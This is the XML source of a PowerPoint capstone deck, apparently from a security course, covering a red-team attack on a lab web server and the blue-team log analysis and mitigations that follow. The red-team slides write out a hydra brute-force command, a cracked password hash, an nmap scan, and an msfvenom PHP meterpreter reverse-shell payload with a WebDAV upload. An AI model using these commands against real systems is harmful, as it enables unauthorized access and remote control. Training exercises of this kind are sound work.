          <p:cNvPr id="1075" name="Google Shape;1075;p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6" name="Google Shape;1076;p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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1077" name="Google Shape;1077;p6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="8346600" cy="3577125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{63185B22-D61D-45F9-9CB7-DBD8C1C59AAB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="27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sz="14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sz="14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sz="14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 Linux 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192.168.1.8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 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Victim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Kibana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192.168.1.100:5601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 visualization dashboard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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083" name="Google Shape;1083;p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4" name="Google Shape;1084;p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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1085" name="Google Shape;1085;p7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="755963914"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="8362500" cy="3466950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{63185B22-D61D-45F9-9CB7-DBD8C1C59AAB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="278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sz="14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14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sz="14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 sensitive information.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="0" i="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i="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 to sensitive directories/files such as the ‘secret_folder’ and its contents.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="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i="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vulnerability allows attackers to view sensitive documents to exploit the system or steal data.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="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attacks.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attacks allows retrieval of account/user passwords.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 brute force attack allows attackers access to accounts to gain access to a system.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File/shell script uploads.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Unauthorized ability to upload files and shell scripts.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vulnerability allows attackers to execute these malicious files to target the system.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Reverse shell session.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Ability to execute a reverse shell to start a meterpreter session.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 to a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" cap="none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meterpreter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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session allows hackers to maneuver within a system and exploit it.</a:t>
                      </a:r>
                      <a:endParaRPr sz="12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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24600" y="-27304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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access Sensitive Information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="0" i="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From a web browser, the Red Team was able to navigate to 192.168.1.105 and view files that indicated there was a ‘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’ directory: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To access the ‘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’, we need to find the password for ‘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ashton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’ (username was noted during authentication prompt):</a:t>
            </a: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2400" b="0" i="0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sp>
        <p:nvSpPr>
          <p:cNvPr id="1121" name="Google Shape;1121;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1205948"/>
            <a:ext cx="9144000" cy="172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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1122" name="Google Shape;112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15" y="1205948"/>
            <a:ext cx="409638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315" y="3464337"/>
            <a:ext cx="5128704" cy="14631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02F49E-3841-4991-8E86-DA108AFD58B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947237" y="3826589"/>
            <a:ext cx="263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“For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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eyes only”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0E6DE8-D5AA-4D76-A6F2-04AA5A0203F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047440" y="1352547"/>
            <a:ext cx="34154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Please refer to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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company_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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1800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secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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 for more information.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9AC653-4316-4652-9B15-D0D2D9BB9BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475615" y="4917927"/>
            <a:ext cx="7164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Please refer to Appendix A1 &amp; A2:  Access Sensitive Information for tools and techniques used.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13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-246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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access Sensitive Information (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="0" i="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b="0" i="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b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Once the password for ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ was cracked, we wer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e able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>access the contents of the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1"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-US" sz="1400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ directory.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" i="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400" b="0" i="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400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The folder contained a file called ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" i="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2400" b="0" i="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2400" b="0" i="0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sp>
        <p:nvSpPr>
          <p:cNvPr id="1136" name="Google Shape;1136;p1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pic>
        <p:nvPicPr>
          <p:cNvPr id="1138" name="Google Shape;113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684" y="1865491"/>
            <a:ext cx="8618220" cy="222821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3734C8-7DD2-46B3-B676-ACC48D334510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1487994" y="4335901"/>
            <a:ext cx="645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..use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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ryan’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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account (Hash:d7dad0a5cd7c8376eeb50d69b3ccd352)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2150</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>286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Roboto Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: Access Sensitive Information  From a web browser, the Red Team was able to navigate to 192.168.1.105 and view files that indicated there was a ‘secret_folder’ directory:           To access the ‘secret_folder’, we need to find the password for ‘ashton’ (username was noted during authentication prompt):      </vt:lpstr>
      <vt:lpstr>Exploitation: Access Sensitive Information (con’t)  Once the password for ‘ashton’ was cracked, we were able to access the contents of the ‘secret_folder’ directory.  The folder contained a file called ‘connect_to_corp_server’:   </vt:lpstr>
      <vt:lpstr>Exploitation: Brute Force Attacks   Brute force the password for user ‘ashton’ to access the hidden directory (secret_folder) using the hydra command:  hydra –l ashton –P /usr/share/wordlists/rockyou.txt –s 80 –f –v 192.168.1.105 http-get /company_folders/secret_folder         Break the hash password for user ‘ryan’ using the site ‘crackstation.net’:        </vt:lpstr>
      <vt:lpstr>Exploitation: File/Shell Script Uploads  Connect to the WebDav server using the username ‘ryan’ and hash password recently cracked:</vt:lpstr>
      <vt:lpstr>Exploitation: File/Shell Script Uploads (con’t)  Create and upload a reverse shell payload script (con’t):                                   </vt:lpstr>
      <vt:lpstr>Exploitation: Reverse Shell Session   From the security tool Metasploit’s command line interface, we create a listener where we wait to be connected to the victim’s machine.      Victim click’s on the ‘shell.php’ file to open up a shell session on the attacker’s machine.    </vt:lpstr>
      <vt:lpstr>Exploitation: Reverse Shell Session (con’t)  From the meterpreter session, we are able to maneuver within the system:  Ability to download a file.          Successfully downloaded this ‘flag.txt’ file into our Kali (attacker) machine:   </vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying Capstone Traffic  From the ‘Top Hosts Creating Traffic’ report, we can see a lot of high traffic coming from the Capstone’s (victim) machine @ 192.168.1.105.                        -  There was a sudden spike over time on May 6, 2021.   </vt:lpstr>
      <vt:lpstr>Analysis: Identifying Request for Hidden Directory  From the ‘Top 10 HTTP requests’ report, we can see that the ‘/company_folders/secret_folder’ directory had a high request count. </vt:lpstr>
      <vt:lpstr>Analysis: Identifying Request for Hidden Directory (con’t)  The request for the ‘secret_folder’ directory started on May 6, 2021 @ 02:31.</vt:lpstr>
      <vt:lpstr>Analysis: Identifying Brute Force Attack  Search results for the ‘connect_to_corp_server’ file in the ‘/company_folders/secret_folder’ directory, indicates the file was successfully accessed 2 times.</vt:lpstr>
      <vt:lpstr>Analysis: Identifying Brute Force Attack (con’t)  The log from May 6, 2021 indicates that the ‘connect_to_corp_server’ file was accessed using the username ‘ashton’.</vt:lpstr>
      <vt:lpstr>Analysis: Finding WebDAV Connection  From the ‘Top 10 HTTP requests’ report, we can see the ‘http://192.168.1.105/webdav’ directory was requested 60 times.                       -  Within this directory, we were able to view and access the ‘shell.php’ file. </vt:lpstr>
      <vt:lpstr>Analysis: Finding WebDAV Connection (con’t)  By searching for the /webdav/shell.php’ file, the search result shows the file was successfully accessed 20 times.</vt:lpstr>
      <vt:lpstr>Analysis: Finding WebDAV Connection (con’t)  The log from May 6, 2021 indicates that the ‘/webdav/shell.php’ file was accessed using the username ‘ryan’.</vt:lpstr>
      <vt:lpstr>Blue Team Proposed Alarms and  Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Blocking IP Traffic</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Request for Hidden Directory</vt:lpstr>
      <vt:lpstr>Mitigation: Preventing Brute Force Attacks</vt:lpstr>
      <vt:lpstr>Mitigation: Detecting WebDAV Connection</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Reverse Shell Uploads</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Appendix </vt:lpstr>
      <vt:lpstr>Appendix A1: Access Sensitive Information </vt:lpstr>
      <vt:lpstr>Appendix A2: Access Sensitive Information   Perform a port scan to retrieve host and  service information:  nmap 192.168.1.8/24                     </vt:lpstr>
      <vt:lpstr>Appendix B: Brute Force Attacks </vt:lpstr>
      <vt:lpstr>Appendix C1: File/Shell Script Uploads </vt:lpstr>
      <vt:lpstr>Appendix C2: File/Shell Script Uploads  Create and upload a reverse shell payload script:  msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4444 &gt; shell.php                 -  Using default port 4444. </vt:lpstr>
      <vt:lpstr>Appendix D1: Reverse Shell Session</vt:lpstr>
      <vt:lpstr>Appendix D2: Reverse Shell Session   Exploit used to create a listener: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Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</dc:title>
  <cp:lastModifiedBy>Tricia T</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-20T04:17:37Z</dcterms:modified>
</cp:coreProperties>
</file>